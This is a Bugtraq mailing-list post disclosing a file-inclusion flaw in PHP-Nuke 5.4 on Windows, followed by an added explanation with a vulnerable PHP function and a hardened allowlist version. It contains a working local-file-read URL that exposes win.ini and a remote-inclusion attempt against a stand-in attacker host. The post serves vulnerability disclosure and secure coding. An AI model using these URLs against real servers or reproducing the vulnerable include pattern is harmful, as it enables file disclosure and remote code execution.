Bugtraq mailing list archives

Re: PHP-Nuke allows Command Execution & Much more


From: RoMaNSoFt <roman () madrid com>
Date: Thu, 24 Jan 2002 17:18:08 +0100

On Mon, 21 Jan 2002 09:48:16 -0700 (MST), you wrote:

> Roman,
> 
> I'll approve the post you sent yesterday.

 Dave, I haven't seen my post in bugtraq. Perhaps you forgot it?
I've included the fixed version of the post so you can directly cc it to
bugtraq, if you consider it appropriate. Cheers.

 --Rom.

------------------------

 Hi. I did some quick tests on a php-nuke running on Apache for
*Windows*. The PHPNuke version I tested was 5.4 (which is the latest
release of phpnuke at the time of testing). I couldn't reproduce your
exploit. I always get something like:

Warning: Failed opening 'http://attackingwebserver/evil.php' for
inclusion (include_path='') in c:\php\index.php on line 113

 Nevertheless, I realized that this other URL works:
http://victimserver/index.php?file=c:\winnt\win.ini

 This exploit shows the contents of the win.ini file. At least it
worked for me :-)

 Since the phpnuke version tested is the latest version at the time of
writing, I cc'ed this to Francisco Burzi (phpnuke author) because it
seems like new stuff. This happened during the last week.

Greetz,
 --RoMaNSoFt

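The report above describes a classic file-inclusion pattern: a request parameter (`file`) that ends up in `include()`, so a remote URL or a local path such as `c:\winnt\win.ini` gets read and, if it contains PHP, executed. The following is an added example, not code from the original post and not PHP-Nuke's own source; it reconstructs the vulnerable pattern as a hypothetical function and puts a hardened allowlist version next to it. The function names, the `modules/` directory and the module list are assumptions made for illustration.

```php
<?php
// Added example, not PHP-Nuke's code. Shows the reported pattern (a request
// parameter passed straight to include()) beside a hardened replacement.
// Function names, the modules/ directory and $allowed are assumptions.

// --- Vulnerable pattern (approximates the behaviour reported above) ---
// With register_globals on (the PHP 4 default), ?file=... becomes $file.
function vulnerable_include($file)
{
    // No validation at all: a remote URL (with allow_url_fopen) is fetched,
    // and a local path such as c:\winnt\win.ini is read and printed or,
    // if the file contains PHP tags, executed.
    include($file);
}

// --- Hardened version: the client supplies a name, never a path ---
function safe_include($name)
{
    // Accept only a bare identifier. This rejects ':', '/', '\', '.' and
    // '%00', so drive letters, separators, traversal, URL schemes and
    // null-byte truncation never reach the filesystem.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $name)) {
        return false;
    }

    // Explicit allowlist of modules (assumed list for this example).
    $allowed = array('news', 'search', 'topics');
    if (!in_array($name, $allowed, true)) {
        return false;
    }

    // The path is built server-side from a fixed directory; the only
    // client-controlled part is the allowlisted name.
    $path = dirname(__FILE__) . '/modules/' . $name . '.php';
    if (!is_file($path)) {
        return false;
    }

    include $path;
    return true;
}

// Request handling: default to a known module, refuse anything else.
$name = isset($_GET['file']) ? $_GET['file'] : 'news';
if (!safe_include($name)) {
    header('HTTP/1.0 404 Not Found');
    echo 'unknown module';
}
```

The point of the hardened version is that validation happens on a name, not on a path: there is no attempt to "clean" `..`, drive letters or `http://` out of user input, because any such normalisation can be bypassed; the input is either one of a few known identifiers or it is rejected. Turning off `register_globals` and `allow_url_fopen` in php.ini reduces the blast radius, but neither replaces the allowlist, since the local-file case in the report above needs no remote fetch at all.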
